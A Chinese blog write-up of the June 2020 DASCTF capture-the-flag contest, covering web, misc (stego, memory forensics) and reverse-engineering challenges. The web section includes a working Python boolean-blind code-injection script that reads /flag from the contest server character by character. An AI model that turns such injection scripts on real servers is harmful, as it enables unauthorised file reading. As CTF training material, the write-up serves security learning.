先上截图:
![图片[1]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-15-1024x271.png)
咳咳,队名怪怪的,这次我跟mz师傅和宇师傅一起组队来着,基本上全程mz师傅带飞,我思路提供+misc输出,宇师傅跟我一起划水.jpg
直接上内容吧。
web1&web2
本质上这俩题目没啥区别。day1上午过滤不全可以直接进行命令执行来着
![图片[2]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-16.png)
然后就修复了,随后转换思路变成布尔注入
mz师傅梭了脚本直接就出了
贴一下脚本
import time
import requests
import re
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Referer': 'http://183.129.189.60:10026/',
'Content-Type': 'application/x-www-form-urlencoded'
}
proxy = {
'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080',
}
url = 'http://183.129.189.60:10026'
payload='input='
flag = 'DASCTF{53a6ee'
py = payload + ''
s = requests.Session()
s.headers = header
sum = 0
index = 13
r = s.get(url, proxies=proxy)
x = re.findall("<h4>(.*?)</h4>",r.text)
x = x[0]
x = x[:-1]
sum = eval(x)
# sum 计算
while True:
end = False
for i in range(33, 127):
time.sleep(0.2)
py = payload + str(sum) + " and open('/flag','r').readline()[" + str(index) + "]=='"+chr(i)+"'"
print(py)
r = s.post(url, data=py, proxies=proxy)
if r.status_code == 200:
x = re.findall("<h4>(.*?)</h4>", r.text)
x = x[0]
x = x[:-1]
sum = eval(x)
if "Congratulations" in r.text:
flag += chr(i)
index += 1
print(flag)
if chr(i) == '}':
end = True
break
else:
print('error')
break
if end:
break
计算器2跟1没多大区别。。。反正一个脚本两个通吃,也没啥意思了。
考点就是布尔盲注11111
phpuns
![图片[3]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-17.png)
这题我们拿的首杀(虽然mz师傅直接梭出来了233333
那也简单写一下,这题mz说直接用给的session
![图片[4]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-18-1024x388.png)
然后呃直接梭出来了。。。
![图片[5]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-19-1024x106.png)
预期解请查看y1ng神仙的wp:https://www.gem-love.com/ctf/2401.html
misc1:
这题属实啥b,看了眼wp才知道原来这么nt。
开局给了明文:
PiTXPBoBd3OVOMdheMGSOZXXeJXXOJ1ge64WPMGBc3cCPJKDc7W=
看了眼wp才知道就是个提取盲水印
![图片[6]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-24.png)
一点提示也不给属实nb,爪巴
base64换表,支出:
from string import maketrans
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
b = '0123456789abcdefGHIJKLMNOPQrstuvwXYZghijklmnopqRSTUVW*ABCDEF@xyz'
c = 'PiTXPBoBd3OVOMdheMGSOZXXeJXXOJ1ge64WPMGBc3cCPJKDc7W='
print (c.translate(maketrans(b,a))).decode('base64')
misc2:PhysicalHacker
这题就差最后一步,摆在了不知道snow隐写,学到了。
开局给的一个加密数据包,给了一个脚本,看来明显是解密了。
配合脚本生成密码本,工具梭出密码。
![图片[7]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-25.png)
解密即可
![图片[8]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-26.png)
常规wireshark分析,提取出一个txt。。
![图片[9]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-27-1024x963.png)
就这个属实搞我心态,最后也就卡这了,学到了是snow隐写,那就简单了,
直接出了。
misc:keyboard
这题是四月赛同意样的题目,直接出了我就直接白嫖分数,由于上次的wp数据丢失,我就补一下。
直接
volatility -f Keyboard.raw –profile=Win7SP1x64 filescan | grep keyboard
找到:
![图片[10]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-20.png)
嗯,然后filedump出来
volatility -f Keyboard.raw –profile=Win7SP1x64 dumpfiles -Q 0x000000003d700880 -D ./ -u
![图片[11]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-21.png)
记事本打开,qwe加密算法就不多说了
直接用来解密serect文件,
![图片[12]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-22.png)
发现没文件,直接nfs数据流查看,就出了
![图片[13]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-23.png)
misc:透明度
明明比头两个简单却分数搞得一批(怪
开局一个图
![图片[14]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-28.png)
题目名称RGBA,下意识就丢在Steg里面了。。。
![图片[15]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-29.png)
然后直接就出了个压缩包。。
提取出来后
![图片[16]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-30.png)
看来是个爆破后两位,爆破出来密码是nepnb
然后就出了。
RE
以下内容均为MZ师傅本人亲笔,或许只有他自己看的懂罢,我先吹为敬
![图片[17]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-31.png)
RE1
档sQfrost熟练的打开了IDA,Remote Windows debugger
0088A5F2
call 008817C6 jmp 00886700
//
Qfrost熟练的打开了IDA,Remote Windows debugger
00889AD5
数据存入
008E7820
ebp-14h的位置存 输入数据
//
新的函数 ecx存储input –>ebp-8h
ebp-14h –>haha1234567890
//ebp-8h –>input
//
strcpy—>009FFB78 小端!
、、在eip=00887AE3上面有一段对input的处理–》处理完存在008D7820的位置
00897000 F2 A8 84 EB 98 9F 26 FB 83 94 22 DC 颞勲槦&麅??
00897010 49 03 2A EA 5E 15 E6 60 56 9E DF D9 I*阇鎌V炦?…
00897000 C6 A5 04 53 33 C3 C8 9E 2F 8F 44 E0 匹S3萌?廌?
00897010 9D 24 2F 28 E4 DC DB 34 78 B8 4C 38 ?/(滠?x窵8….
、、!!!真正的比较函数再0088531E
flag=
123456789012345678901234
008D7820 B9 F2 47 1C 44 B5 9B F9 61 F0 18 B3 C0 4F 2B 70 跪GD禌鵤?忱O+p
008D7830 8C AA 87 74 39 EF 11 71 尓噒9?q…
与一部分的字符异或就能得到flag
include
include
void main(){
unsigned char c[] = {
0x88,0xc0,0x74,0x28,
0x71,0x83,0xAC,0xc1,
0x58,0xc0,0x29,0x81,
0xF3,0x7B,0x1E,0x46,
0xbb,0x92,0xBE,0x44,
0x08,0xdd,0x22,0x45
};
unsigned char result[] = {
0xC6,0xa5,0x04,0x53,
0x33,0xc3,0xc8,0x9e,
0x2f,0x8f,0x44,0xe0,
0x9d,0x24,0x2f,0x28,
0xe4,0xdc,0xdb,0x34,
0x78,0xb8,0x4c,0x38
};
unsigned char input[25]={0};
int i;
for (i = 0 ; i< 24; i ++){
input[i] = c[i] ^ result[i];
}
printf("%s", input);
return;
}
RE2:
‘
^
select
WHERE
flag=
c92bb6a5+a6c30091+24566d882d4bc7ee
c92bb6a5a6c3009124566d882d4bc7ee
读tt.txt到v8
做aes
2490AAB87A7CB1487B13F0F7A3B316FA
密钥:f7c6b5a4 1107cfaf
4a5b6c7ffafc7011
==>a6c30091ffffffff ==>v22
v3=30306C3E3E3D3C3A 00l>>=<: v4=mm?kj>l00
v4= :l<jk?mm
RE6:
![图片[18]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-32.png)
嗯,没有思路分析,看出来tql55555
RE4:
有点可惜,出来个大概结果全都不正确,先贴在这。
strlen(input) == 32
Nep{*}
从最后一位遍历
1.对称的两位 异或 以后有要求
0123456789
Nep{mrcladmaoisnotfree}
Y o
i
y O
U o
e _
u O
^ o
n _
~ O
O x
_ h
o X
2.对称的两位 与 以后有要求
猜测
Nep{mircle_and_maho_is_not_free}
//
Nep{mYrclU_a^dOmaxooisonotofree}/
Nep{mYrclU_a^dOmaxooisonotofree}/
Nep{mYrclU_a^domaXooisonotofree}/
Nep{mYrclU_andOmaxo_isonotofree}/
Nep{mYrclU_andOmaxo_isonotofree}/
Nep{mYrclU_andomaXo_isonotofree}/
Nep{mYrclU_a~dOmaxoOisonotofree}/
Nep{mYrclU_a~d_mahoOisonotofree}=
Nep{mYrclU_a~domaXoOisonotofree}/
Nep{mYrcle_a^dOmaxoois_notofree}/
Nep{mYrcle_a^d_mahoois_notofree}=
Nep{mYrcle_a^domaXoois_notofree}/
Nep{mYrcle_andOmaxo_is_notofree}/
Nep{mYrcle_and_maho_is_notofree}=
Nep{mYrcle_andomaXo_is_notofree}/
Nep{mYrcle_a~dOmaxoOis_notofree}/
Nep{mYrcle_a~d_mahoOis_notofree}=
Nep{mYrcle_a~domaXoOis_notofree}/
Nep{mYrclu_a^dOmaxooisOnotofree}/
Nep{mYrclu_a^d_mahooisOnotofree}=
Nep{mYrclu_a^domaXooisOnotofree}/
Nep{mYrclu_andOmaxo_isOnotofree}/
Nep{mYrclu_and_maho_isOnotofree}=
Nep{mYrclu_andomaXo_isOnotofree}/
Nep{mYrclu_a~dOmaxoOisOnotofree}/
Nep{mYrclu_a~d_mahoOisOnotofree}=
Nep{mYrclu_a~domaXoOisOnotofree}/
Nep{mirclU_a^dOmaxooisonot_free}/
Nep{mirclU_a^d_mahooisonot_free}=
Nep{mirclU_a^domaXooisonot_free}/
Nep{mirclU_andOmaxo_isonot_free}/
Nep{mirclU_and_maho_isonot_free}=
Nep{mirclU_andomaXo_isonot_free}/
Nep{mirclU_a~dOmaxoOisonot_free}/
Nep{mirclU_a~d_mahoOisonot_free}=
Nep{mirclU_a~domaXoOisonot_free}/
Nep{mircle_a^dOmaxoois_not_free}/
Nep{mircle_a^d_mahoois_not_free}=
Nep{mircle_a^domaXoois_not_free}/
Nep{mircle_andOmaxo_is_not_free}/
Nep{mircle_and_maho_is_not_free}=
Nep{mircle_andomaXo_is_not_free}/
Nep{mircle_a~dOmaxoOis_not_free}/
Nep{mircle_a~d_mahoOis_not_free}=
Nep{mircle_a~domaXoOis_not_free}/
Nep{mirclu_a^dOmaxooisOnot_free}/
Nep{mirclu_a^d_mahooisOnot_free}=
Nep{mirclu_a^domaXooisOnot_free}/
Nep{mirclu_andOmaxo_isOnot_free}/
Nep{mirclu_and_maho_isOnot_free}=
Nep{mirclu_andomaXo_isOnot_free}/
Nep{mirclu_a~dOmaxoOisOnot_free}/
Nep{mirclu_a~d_mahoOisOnot_free}=
Nep{mirclu_a~domaXoOisOnot_free}/
Nep{myrclU_a^dOmaxooisonotOfree}/
Nep{myrclU_a^d_mahooisonotOfree}=
Nep{myrclU_a^domaXooisonotOfree}/
Nep{myrclU_andOmaxo_isonotOfree}/
Nep{myrclU_and_maho_isonotOfree}=
Nep{myrclU_andomaXo_isonotOfree}/
Nep{myrclU_a~dOmaxoOisonotOfree}/
Nep{myrclU_a~d_mahoOisonotOfree}=
Nep{myrclU_a~domaXoOisonotOfree}/
Nep{myrcle_a^dOmaxoois_notOfree}/
Nep{myrcle_a^d_mahoois_notOfree}=
Nep{myrcle_a^domaXoois_notOfree}/
Nep{myrcle_andOmaxo_is_notOfree}/
Nep{myrcle_and_maho_is_notOfree}=
Nep{myrcle_andomaXo_is_notOfree}/
Nep{myrcle_a~dOmaxoOis_notOfree}/
Nep{myrcle_a~d_mahoOis_notOfree}=
Nep{myrcle_a~domaXoOis_notOfree}/
Nep{myrclu_a^dOmaxooisOnotOfree}/
Nep{myrclu_a^d_mahooisOnotOfree}=
Nep{myrclu_a^domaXooisOnotOfree}/
Nep{myrclu_andOmaxo_isOnotOfree}/
Nep{myrclu_and_maho_isOnotOfree}=
Nep{myrclu_andomaXo_isOnotOfree}/
Nep{myrclu_a~dOmaxoOisOnotOfree}/
Nep{myrclu_a~d_mahoOisOnotOfree}=
Nep{myrclu_a~domaXoOisOnotOfree}/
暂无评论内容